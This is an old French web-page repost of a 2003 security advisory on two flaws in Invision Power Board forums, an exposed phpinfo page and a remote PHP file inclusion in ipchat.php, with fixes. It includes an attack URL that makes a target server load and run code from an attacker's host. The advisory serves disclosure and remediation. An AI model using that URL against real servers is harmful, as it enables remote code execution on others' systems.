Bienvenue sur horslimite.net
Ce site vous propose tutoriels de programmations (php javascript ...) forum compteur de connectés, compteur de visites, script php, téléchargement de logiciel, Blog etc...
les DRM c’est la grippe aviaire du numérique et de la culture
 
aide webmastering webmaster compteur forum Menu
home
  • News
  • Recherche
  • Téléchargement
  • Statistiques
    • Tutoriels      
  • PHP     
  • JavaScript     
  • Crack
  • Linux     
  • Back orifice
  • Faille include (php)
    • Membre      
  • Inscription
  • Liste des membres
  • Votre profil
  • Compteur de visites
  • Compteur de connectés
  • Votre carte membre
  • Messagerie interne
  • Blog
    • Service      
  • Whois
  • Header d\\\\'une page
  • Obtenir une IP
  • Générateur de méta-tags
    • Forum


    Votez pour ce site au Weborama
    > tutoriel > exploit > InvisionPowerBoard


    InvisionPowerBoard

    Invision Power Board
    ********************
    Informations :
    °°°°°°°°°°°°°°
    Langage : PHP
    Website : http://www.invisionboard.com
    --------------------------
    Version : 1.0.1
    Problème : phpinfo()
    --------------------------
    Version : 1.1.1
    Problème : Inclusion de fichier


    Developpement :
    °°°°°°°°°°°°°°°
    Invision Power Board est un forum très complet comprenant une partie admin, une gestion de droits (modérateur,...),
    une partie membre, une liste membre, un fichier d'aide, un affichage et un gestion de profils, un Messenger,
    la gestions d' "amis",...

    Dans la version 1.0.1 on retrouve une faille relativement classique, c'est l'affichage pour tous du résultat de l'execution
    de la commande phpinfo();, qui contient une faille Cross Site Scripting et révèle énormement d'informations sur l'ordinateur,
    le serveur ou la configuration PHP.
    Ce code se trouve dans le fichier phpinfo.php :
    ----------
    <?php
    phpinfo();
    ?>
    ----------
    Il suffira donc d'y accèder avec une url du type http://[target]/phpinfo.php .


    Dans la dernière version de ce forum à cette date, la 1.1.1, un nouveau fichier fait son apparition : le fichier ipchat.php.
    Dans ce fichier on peut voir comme première ligne de code :
    -------------------------------------
    require $root_path."conf_global.php";
    -------------------------------------
    Ce code n'est une faille que si register_globals=ON.
    Si la configuration est bien 'favorable' au hacker, un fichier exterieur au serveur peut être inclut et executé comme
    du code php dans ipchat.php, par le serveur et avec ses droits et restrictions.
    Par exemple l'url :
    http://[target]/ipchat.php?root_path=http://[attacker]/
    inclura et executera le fichier :
    http://[attacker]/conf_global.php
    dans :
    http://[target]/ipchat.php


    Solutions :
    °°°°°°°°°°°
    Pour la version 1.0.1, simplement supprimer le fichier phpinfo.php.

    Pour la version 1.1.1, il suffira de mettre comme première ligne dans le fichier ipchat.php le code :
    ------------------
    $root_path = "./";
    ------------------

    Des patchs peuvent être trouvés sur http://www.phpsecure.org.

    Credits :
    °°°°°°°°°
    Auteur : frog-m@n
    E-mail : frog-man@frog-man.org
    Website : http://www.phpsecure.org
    Date : 27/02/03
    Copyright frog-m@n http://www.phpsecure.info/v2/zone/pArticle
    		 
    page générée en 68 millisecondes